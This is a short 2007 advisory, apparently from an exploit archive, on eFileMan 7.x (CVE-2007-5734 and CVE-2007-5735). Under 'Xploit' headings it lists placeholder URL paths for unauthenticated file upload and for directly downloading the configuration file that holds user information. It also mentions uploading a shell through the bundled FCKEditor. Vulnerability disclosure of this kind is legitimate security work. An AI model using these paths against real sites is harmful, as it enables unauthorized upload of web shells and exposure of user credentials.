eFileMan 7.x Multiple Vulnerabilities

2007.10.31

Credit: Xcross87

Risk: High

Local: No

Remote: Yes

CVE: CVE-2007-5734 | CVE-2007-5735

CWE: N/A

Software : eFileman

Version : 7.x (tested on 7.1.0.87-88)

Found by : Xcross87

A. Remote File Upload Vulnerability :

Xploit :

http://victim.com/[path]/upload.html

http://victim.com/[path]/cgi-bin/efileman/upload.cgi

The uploaded files are stored in :

http://victim.com/[path]/uploads/upload_file.xxx

B. Direct Access or Download Configuration File

Xploit :

http://victim.com/[path]/cgi-bin/efileman/efileman_config.pm <-- check user information

C. FCKEditor Inclusion.

For full pack of eFileman installation including FCKEditor, attacker can up shell through upload vulnerability of FCK

=== Xcross87 | HCETeam Xploiter ===

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

eFileMan 7.x Multiple Vulnerabilities

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

eFileMan 7.x Multiple Vulnerabilities

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.